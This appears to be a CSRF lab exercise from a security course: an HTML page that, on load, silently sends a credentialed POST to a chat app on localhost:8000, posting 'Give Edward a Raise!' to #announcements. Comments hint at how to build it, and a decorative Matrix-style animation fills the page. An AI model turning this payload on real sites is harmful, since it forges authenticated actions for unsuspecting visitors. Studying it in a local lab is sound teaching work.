<html>

<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <script src="https://code.jquery.com/jquery-3.5.1.min.js" integrity="sha256-9/aliU8dGd2tb6OSsuzixeV4y/faTqgFtohetphbbj0=" crossorigin="anonymous"></script>
  <title>CSRF Demo @ NSK</title>
  <script type="text/javascript">
    $.ajax({
    type: "POST",
    url: "http://localhost:8000/post",
    data: { message: "Give Edward a Raise!", channel: "#announcements" },
    xhrFields: {withCredentials: true}
    })

    // Hints:
    // 1. Use the function `$.ajax` to send a request:
    //    http://api.jquery.com/jquery.ajax/
    // 2. If cookies are not included, try looking at the `xhrFields` parameter
  </script>
  <style type="text/css">body { margin: 0px; }
  </style>
</head>

<body>
<p align="center">
<canvas id="q" width="100%" height="400">Sorry Browser Won't Support</canvas>
<script>
$(document).ready(function(){
var s=window.screen;
var width = q.width = window.innerWidth;
var height = q.height = window.innerHeight * 0.9;
var yPositions = Array(300).join(0).split('');
var ctx=q.getContext('2d');

function draw() {
  ctx.fillStyle='rgba(0,0,0,.05)';
  ctx.fillRect(0,0,width,height);
  ctx.fillStyle='#0F0';
  ctx.font = '10pt Georgia';
  yPositions.map(function(y, index){
    text = String.fromCharCode(1e2+Math.random()*33);
    x = (index * 10)+10;
    q.getContext('2d').fillText(text, x, y);
	if(y > 100 + Math.random()*1e4)
	{
	  yPositions[index]=0;
	}
	else
	{
      yPositions[index] = y + 10;
	}
  });
};
function RunMatrix()
{
if(typeof Game_Interval != "undefined") clearInterval(Game_Interval);
		Game_Interval = setInterval(draw, 33);
}
RunMatrix();
});
</script>
Matrix Redesigned by Arunkumar Gudelli (<a href="http://www.arungudelli.com/html5/matrix-effect-using-html5-and-javascript/">Source</a>)
</p>
</body>

</html>
